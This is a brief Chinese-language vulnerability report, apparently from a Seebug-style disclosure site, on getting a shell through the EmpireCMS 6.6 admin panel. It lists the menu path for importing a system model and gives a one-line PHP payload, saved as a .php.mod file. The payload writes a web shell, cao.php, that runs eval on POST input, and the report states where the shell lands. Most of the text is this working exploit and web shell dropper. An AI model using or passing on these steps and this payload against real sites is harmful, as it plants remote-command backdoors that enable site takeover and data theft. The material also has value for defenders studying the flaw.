帝国(EmpireCMS)cms 6.6 后台拿shell

### 简要描述： 以前6.5的有人发的方法是，（进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传，新版使用uploadm~num.php来递增数字） ### 详细说明： 以前6.5的有人发的方法是，（进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传，新版使用uploadm~num.php来递增数字）发现6.6不行，上传之后会变成类似uploadm1324885505nXmTdQamQq.php这样的！ ### 漏洞证明： 换了个办法其实也很简单<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?> 保存为1.php.mod 然后还是进入后台---系统设置---管理数据表---管理系统模型---导入新型模块，上传之后马儿就躺在了/e/admin/cao.php了 [<img src="https://images.seebug.org/upload/201112/261620342bb721b34c82f845541f4e0722330225.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201112/261620342bb721b34c82f845541f4e0722330225.jpg)